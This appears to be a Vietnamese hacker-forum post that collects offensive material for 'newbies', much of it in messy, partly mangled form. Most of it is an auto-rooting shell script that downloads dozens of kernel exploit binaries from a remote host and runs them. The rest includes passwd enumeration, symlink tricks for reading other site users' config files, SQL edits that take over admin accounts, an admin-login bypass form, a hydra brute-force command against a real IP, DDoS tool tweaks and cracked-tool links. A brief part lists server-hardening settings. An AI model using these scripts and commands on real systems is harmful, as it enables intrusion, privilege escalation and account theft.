http://www.mediafire.com/?83m6n423zws9o#djh8h0y150m55
Chia sẻ cho ae newbie 1 kho tài liệu lập trình, local,...
Chia sẻ cho ae newbie 1 kho tài liệu lập trình, local,...
awk -F: '{ print $1 }' /etc*/passwd | sort
awk -F: '{ print $ 1 "" $ 2 "" $ 3 "" $ 4 "" $ 5 "" $ 6 "" $ 7 "" }'
/etc*/passwd | sort
cd /etc; cat passwd
cat /etc/valiases/domain.tld
awk -F ":" '{print "user ****:" $ 1 "\ t \ tuid:" $ 3}' /etc/passwd
NetCat
Giải nén => up lên server => chmod +x cho file run.sh => chạy file=============
locus shell : backdoor host=============
TUT GetRoot PA VietNam
#!/bin/sh
# Auto Rooting Exploiter Script
# _____ __ __________ __
# / _ \ __ ___/ |_ ____ \______ \ ____ _____/ |_
# / /_\ \| | \ __\/ _ \ | _// _ \ / _ \ __\
#/ | \ | /| | ( <_> ) | | ( <_> | <_> ) |
#\____|__ /____/ |__| \____/ |____|_ /\____/ \____/|__|
# \/ \/
#To start script "./autoroot.sh"
#Author :- Ne0-h4ck3r
#Love To :- sec4ever.com
#Greetz to :- TiGER-M@ATE,ApOcalYpse,The Injector,N4ss1m,H311-C0d3,b0x,FoX-HaCkEr,darkl00k,Goog!l-warrr!03,m4ck,br0wn-sug4r
#Email ID :- localhost_21@hotmail.com
function checkroot {
if [ "$(id -u)" = "0" ]; then
cd ..;
rm -r sec4;
echo "Got root";
exit;
else
echo "No good. Still "`whoami`;
echo "";
fi;
}
uname -a;
mkdir sec4;
cd sec4;
echo "Checking if already root...";
checkroot;
wget http://dl.dropbox.com/u/59362344/new/1-2;
chmod 0777 1-2;
./1-2;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/1-3;
chmod 0777 1-3;
./1-3;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/1-4;
chmod 0777 1-4;
./1-4;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/2;
chmod 0777 2;
./2;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/2-1;
chmod 0777 2-1;
./2-1;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/2-6-32-46-2011;
chmod 0777 2-6-32-46-2011;
./2-6-32-46-2011;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/2-6-37;
chmod 0777 2-6-37;
./2-6-37;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/2.6.18-6-x86-2011;
chmod 0777 2.6.18-6-x86-2011;
./2.6.18-6-x86-2011;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/2.6.18-164-2010;
chmod 0777 2.6.18-164-2010;
./2.6.18-164-2010;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/2.6.18-194;
chmod 0777 2.6.18-194;
./2.6.18-194;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/2.6.18-194.1-2010;
chmod 0777 2.6.18-194.1-2010;
./2.6.18-194.1-2010;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/acid;
chmod 0777 acid;
./acid;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/2.6.18-194.2-2010;
chmod 0777 2.6.18-194.2-2010;
./2=2.6.18-194.2-2010;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/2.6.18-274-2011;
chmod 0777 2.6.18-274-2011;
./2.6.18-274-2011;
checkroot;
wget http://dl.dropbox.com/u/59362344/new...12.1.el5-2012;
chmod 0777 2.6.18-374.12.1.el5-2012;
./2.6.18-374.12.1.el5-2012;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/2.6.28-2011;
chmod 0777 2.6.28-2011;
./2.6.28-2011;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/2.6.32-46.1.BHsmp;
chmod 0777 2.6.32-46.1.BHsmp;
./2.6.32-46.1.BHsmp;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/2.6.33;
chmod 0777 2.6.33;
./2.6.33;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/2.6.33-2011;
chmod 0777 2.6.33-2011;
./2.6.33-2011;
checkroot;
wget http://dl.dropbox.com/u/59362344/new...-2011Exploit1;
chmod 0777 2.6.34-2011Exploit1;
./2.6.34-2011Exploit1;
checkroot;
wget http://dl.dropbox.com/u/59362344/new...-2011Exploit2;
chmod 0777 2.6.34-2011Exploit2;
./2.6.34-2011Exploit2;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/2.6.37;
chmod 0777 2.6.37;
./2.6.37;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/2.6.37-rc2;
chmod 0777 2.6.37-rc2;
./2.6.37-rc2;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/2.34-2011Exploit1;
chmod 0777 2.34-2011Exploit1;
./2.34-2011Exploit1;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/3;
chmod 0777 3;
./3;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/4;
chmod 0777 4;
./4;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/5;
chmod 0777 5;
./5;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/6;
chmod 0777 6;
./6;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/7;
chmod 0777 7;
./7;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/7-2;
chmod 0777 7-2;
./7-2;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/7x;
chmod 0777 7x;
./7x;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/8;
chmod 0777 8;
./8;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/9;
chmod 0777 9;
./9;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/10;
chmod 0777 10;
./10;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/11;
chmod 0777 11;
./11;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/13x;
chmod 0777 13x;
./13x;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/14;
????: Th3 0uTl4wS r3Fug3 http://board.th3-0utl4ws.com/showthread.php?t=24228
chmod 0777 14;
./14;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/15.sh;
chmod 0777 15.sh;
./15.sh;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/16;
chmod 0777 16;
./16;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/16-1;
chmod 0777 16-1;
./16-1;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/18;
chmod 0777 18;
./18;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/18-5;
chmod 0777 18-5;
./18-5;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/31;
chmod 0777 31;
./31;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/36-rc1;
chmod 0777 36-rc1;
./36-rc1;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/44;
chmod 0777 44;
./44;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/15150;
chmod 0777 15150;
./15150;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/15200;
chmod 0777 15200;
./15200;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/exp1;
chmod 0777 exp1;
./exp1;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/exp2;
chmod 0777 exp2;
./exp2;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/exp3;
chmod 0777 exp3;
./exp3;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/exploit;
chmod 0777 exploit;
./exploit;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/full-nelson;
chmod 0777 full-nelson;
./full-nelson;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/gayros;
chmod 0777 gayros;
./gayros;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/lenis.sh;
chmod 0777 lenis.sh;
./lenis.sh;
checkroot;
wget http://dl.dropbox.com/u/59362344/new...xploit-gayros;
chmod 0777 local-root-exploit-gayros;
./local-root-exploit-gayros;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/pwnkernel;
chmod 0777 pwnkernel;
./pwnkernel;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/root1;
chmod 0777 root1;
./root1;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/root.py;
chmod 0777 root.py;
./root.py;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/runx;
chmod 0777 runx;
./runx;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/tivoli;
chmod 0777 tivoli;
./tivoli;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/ubuntu;
chmod 0777 ubuntu;
./ubuntu;
checkroot;
wget http://dl.dropbox.com/u/59362344/new...-root-exploit;
????: Th3 0uTl4wS r3Fug3 http://board.th3-0utl4ws.com/showthread.php?t=24228
chmod 0777 vmsplice-local-root-exploit;
./vmsplice-local-root-exploit;
checkroot;
wget http://dl.dropbox.com/u/59362344/new/z1d-2011;
chmod 0777 z1d-2011;
./z1d-2011;
checkroot;
60671c896665c3fa MySQL loại 16 kí tự
667f407de7c6ad07358fa38daed7828a72014b4e MySQL5 loại 40 kí tự
bde52cb31de33e46245e05fbdbd6fb24 MD4 loại này 32 kí tự
a0f0057303393f643a09d7db430b9fe1 MD4 (HMAC*) 32 kí tự
veUssx3jPkYkXgX729b7JA==Z7g= MD4 (Base64*) Loại này dạng base64 có 28 kí tự
0cc175b9c0f1b6a831c399e269772661 MD5 32 kí tự
3673438f11d71c21a9b8b59232a3dd61 MD5 (HMAC) 32 dạng HMAC 32 kí tự
DMF1ucDxtqgxw5niaXcmYQ==Z7g= MD5 (Base64) 28 Kí tự
$1$$Ij31LCAysPM23KuPlm1wA/ MD5 (Unix) 26 kí tự
$apr1$$ny0TwGBt5/BPT4.mbWBKk. MD5 (APR) 29 kí tự.
9bea8ee5c345f595cd9f9b37a1a2a887 MSCash 32 kí tự
86f7e437faa5a7fce15d1ddcb9eaeaea377667b8
7f984109f39759f3f41dba04f5183741e36f1445 Sha-1 (HMAC) 40 kí tự
hvfkN/qlp/zhXR3cuerq6jd2Z7g= Sha-1 (Base64) 28 kí tự
http://www.mediafire.com/?tok0nel4cbygisvPassword:
juno_okyoPhiên bản mới này của Anonymous 2012.
GenericBoost.hoic
edit cái poplute list// populate list
useragents.Append "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
useragents.Append "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
useragents.Append "Googlebot/2.1 (+http://www.google.com/bot.html)"
useragents.Append "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)"
useragents.Append "Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
cat /etc/passwd : liệt kê các user có trên server
dir /home/user/public_html/ : đi đến public_html của user
ln -s /home/user/public_html/index.php hehe.txt : ghi file index.php vào file hehe.txt trên thư mục mình đang dùng : ví dụ đang dùng http://abc.com/c99.php thì vào http://abc.com/hehe.txt
ln -s /home/user_của_mình/public_html/c99.php /home/user_của_victim/public_html/c99.php lựa chọn thư mục chmod 777 hay 755 mà có quyền ghi nhé
cat /home/user/public_html/forum/includes/config.php >> xem file config.php
tar -czf hehehe.tar.gz /home/user/public_html/forum/
tar -czf config.tar.gz /home/user/public_html/forum/includes/config.php
chmod a+wxr file.php -rwxrwxrwx chmod a+drw file.php -rwxrwxrwx chmod -R a+rx thumuc >> giao quyen doc va vao ben trong thu muc,ke ca thu muc con
<?php chmod("backup", 0777); ?>
update user set email="hehehe@yahoo.com" where id=1
update user set id ='6'where user='hehehe'
update user set passwd ="e10adc3949ba59abbe56e057f20f883e" where id=1
Sau đó upload lên thư mục chứa website.
display_errors = Off
log_errors = On
Lưu ý: bạn có thể bỏ bớt các hàm trong danh sách hàm bị vô hiệu nếu hàm đó cần cho website của bạn hoạt động.
disable_functions = passthru, system, shell_exec, exec, dir, readfile, virtual, proc_terminate
safe-mode = on
Mục đích để ngăn cản việc download source code khi PHP bị overload hoặc terminated. Nguyên nhân có thể đến từ bên trong hoặc bên ngoài. Tôi không đề cập ở đây.
<Files "config.php"> Order Allow,Deny</Files>
Deny from All
</Files>
<Files "class_core.php">
Order Allow,Deny
Deny from All
Sau đó chmod 444 cho file.
php_admin_flag engine off
http://www.mediafire.com/?i85omji4kil304cTool: Acunetix Web Vulnerability Scanner
Tut:Sử dụng 2 tool Metasploit Framework và Intelli Admin trên nền Windows, để tìm và khai thác lỗi chạy shell, add user , nâng quyền user và remote desktop từ máy client đến máy server.
+ Cấu hình địa chỉ ip.
+ Thường xuyên update bản vá lỗi trên nền server sử dụng.
+ ...
Lưu code dưới dạng abc.html ,code này vượt qua kiểm tra đăng nhập /admin sẽ tạo 1 user với quyền administrator
username=password=admin<html>
<title>add adnub</title>
<body link="#00FF00" text="#008000" bgcolor="#000000">
<form method="POST"
action="http://abc.com/admin/options/users.php">
<input type="hidden" name="type" value="add">
<table border="1" cellpadding="4" style="border-collapse: collapse"
width="100%" bordercolor="#808080">
<tr>
<td>
<p align="center"><b>User & Pass : admin</b></p>
<font color="#00FF00">Add new</font></a></font></b></p>
<p align="center"><b>Username:</b></td>
</tr>
<tr>
<td height="1">
<p align="center"><input
type="text" name="adminuser" size="30" value="admin"></td>
</tr>
<tr>
<td>
<p align="center"><b>Password:</b></td>
</tr>
<tr>
<td height="22">
<p align="center">
<input type="password" name="adminpass" size="30" value="admin"></td>
</tr>
<tr>
<td align="right">
<p align="center">
<input type="submit" value="Add User >>" style="font-weight:
700"></td>
</tr>
</form>
</table></html>
http://www.mediafire.com/?6ki0mb1cvab0c5k
Thường thì dùng shell để đoán pass loạn tử cung
Bây h cũng đoán pass,nhưng = hydra
Download -> giải nén vào ổ C:\ -> thư mục C:\hydra
Windown + R -> cmdedit thư mục abc.txt -> các user trên svcd C:\hydra
hydra -L abc.txt -P pass.txt -e ns 112.78.2.4 ftp
112.78.2.4 : ip sv
Nếu sv chặn việc brute thì hiệnCòn ko thì sẽ nhận đc user+pass ftpToo many connections
Vulnerability Scanner 8
crack :
Xong thì mở Acunetix lên :| Nó kêu active thì cứ điền thí vào next, next là xong.
http://hvaonline.net
http://1337day.com/author/2901
http://www.exploit-db.com/
http://th3-0utl4ws.com/
http://www.leetupload.com
http://hvh.vn
http://vnhacker.blogspot.com/
http://rootbiez.blogspot.com/
http://eidelweiss-advisories.blogspot.com
http://www.tamhon.net/
http://blog.enhack.net
http://tuonglua.net
http://cya0vn.blogspot.com
http://vinakid.blogspot.com/
http://dz4all.com/
http://www.governmentsecurity.org
http://www.blog.kai.vn
http://uitns.net/forum/
http://diendanmaychu.vn/f
http://www.kmasecurity.net/xforce/
http://ha.ckers.org
http://www.nhatnghe.com
http://ceh.vn
http://athena.edu.vn
http://vnpro.org/forum/
http://www.huongdanlaptrinh.com
http://thantoc.net/
http://www.viprasys.org >> yahoo
http://www.botsvsbrowsers.com/SimulateUserAgent.asp
http://vctools.net/forum/
http://www.turkhackteam.net/
http://rstcenter.com/forum/
http://translate.googleusercontent.c...dZg35VG92gA-SA
http://www.iexploit.org
http://www.r00tw0rm.com/forum
http://hashchecker.de/ >crack pass
http://board.th3-0utl4ws.com
http://www.thehackernews.com/
http://www.hackthissite.org
http://translate.google.com.vn/trans...ec4ever.com%2F
http://vbspiders.com/tools/locals/
http://h4ckcity.org/forums/
http://ethical-hacking-tutor.blogspot.com
http://www.toiphammaytinh.com
http://forum.itsecteam.com/
http://packetstormsecurity.org/
http://hocphponline.com/blog/
http://www.alboraaq.com/forum/
http://irist.ir/forum/index.php
http://www.sellug.com
http://alikaptanoglu.blogspot.com
http://www.hackhound.org
http://www.beenuarora.com/
http://www.securitytube.net/
http://satthuo.blogspot.com/
http://www.secunet.to/
http://www.vulnerability-lab.com/
http://hack4sec.org/
http://www.turkblackhats.com/tb/index.php
http://s-war.com/vb/forum.php
http://hackerzone.vn/vnhz/index.php
http://www.opensc.ws/cracked-malware/
http://www.securitytube.net/listing?type=latest
boot alexa :http://alexa.lr2b.com
http://studyandshare.wordpress.com/ : java
http://www.htaccessredirect.net/index.php : tao htaccess
http://blackburnhacker.blogspot.com/...ia-botnet.html :botnet
http://www.ubers.org/Forum-IRC-Bots-Botnets-DDOS
http://www.md5-db.com/index.phpmore....
http://plain-text.info/add/
http://www.tmto.org/
https://hashcracking.ru/
http://hashcrack.com/
http://www.cryptohaze.com/addhashes.php
http://md5.rednoize.com/
http://isc.sans.org/tools/reversehash.html
http://www.c0llision.net/webcrack.php
http://www.md5decrypter.co.uk/
http://passcrack.spb.ru/
http://www.hashreverse.com/
http://rainbowcrack.com/
http://www.md5encryption.com/
http://www.shalookup.com/
http://md5.rednoize.com/
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.tmto.org/
http://linardy.com/md5.php
http://www.gdataonline.com/seekhash.php
https://www.w4ck1ng.com/cracker/
http://search.cpan.org/~blwood/digest-md5-reverse-1.3/
http://www.hashchecker.com/index.php?_sls=search_hash
http://tinhoc365.net/